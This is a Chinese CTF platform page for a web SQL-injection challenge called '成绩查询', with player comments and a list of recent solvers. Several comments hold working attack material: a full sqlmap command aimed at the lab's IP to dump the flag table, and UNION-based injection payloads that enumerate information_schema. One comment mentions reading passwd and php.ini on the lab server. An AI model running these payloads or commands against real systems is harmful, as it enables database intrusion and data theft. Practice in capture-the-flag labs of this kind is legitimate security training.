成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 8189
提  示:
描  述:
来源山科大ctf
...
登录回复
评论
EtHat 5月前
举报

sqlmap一把梭哈

回复 0
blackjack009 5月前
举报

python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump

回复 0
18946551925 5月前
举报

为什么一注入就连接已重置啊??????烦死了,差哪呢?

回复 1
xiaohaisec 6月前
举报

1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa

回复 0
n0pass 7月前
举报

启动环境以后网页打不开啊。。。。。。退钱

回复 0
harry 管理员 7月前
举报

已修复,金币退了

回复 1
老渡真的不懂 8月前
举报

环境有点问题,有时能用有时不能用。试了一下passwd,group,php.ini能看,像我这样的菜鸟也就看看,做不了什么,大神恐怕随随便便就能破坏环境,感觉权限给高了。环境总出问题不会是大佬进去搞破坏了吧?

回复 1
samRsa 8月前
举报

这题也太简单了

回复 0
逐月 8月前
举报

一尝试注入就链接被重置,我真的被气得头疼

回复 1
逐月 8月前
举报

烦死了烦死了一sql注入就页面一直转,然后链接被中断,这是在干什么。。

回复 1
ls666 8月前
举报

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag; 然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

回复 1
xiashuidao 7月前
举报

id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

回复 1

WriteUp

image
harry

2 金币

立即查看

评分(19)

解题动态

13170223655 攻破了该题 11小时前
nlHaha 攻破了该题 1天前
liuyuchen 攻破了该题 1天前
ey0272 攻破了该题 1天前
codehub 攻破了该题 2天前
18993762527 攻破了该题 2天前
coolsword2023 攻破了该题 4天前
群众里有坏人 攻破了该题 4天前
ey027 攻破了该题 7天前
1802392956 攻破了该题 7天前
donbrothers 攻破了该题 7天前
小噗 攻破了该题 7天前
LUCKY721 攻破了该题 7天前
yijueo 攻破了该题 8天前
wwt111 攻破了该题 8天前
lotuswhite 攻破了该题 8天前
lizhi123456 攻破了该题 9天前
111lll 攻破了该题 9天前
441062352 攻破了该题 10天前
17745788393 攻破了该题 10天前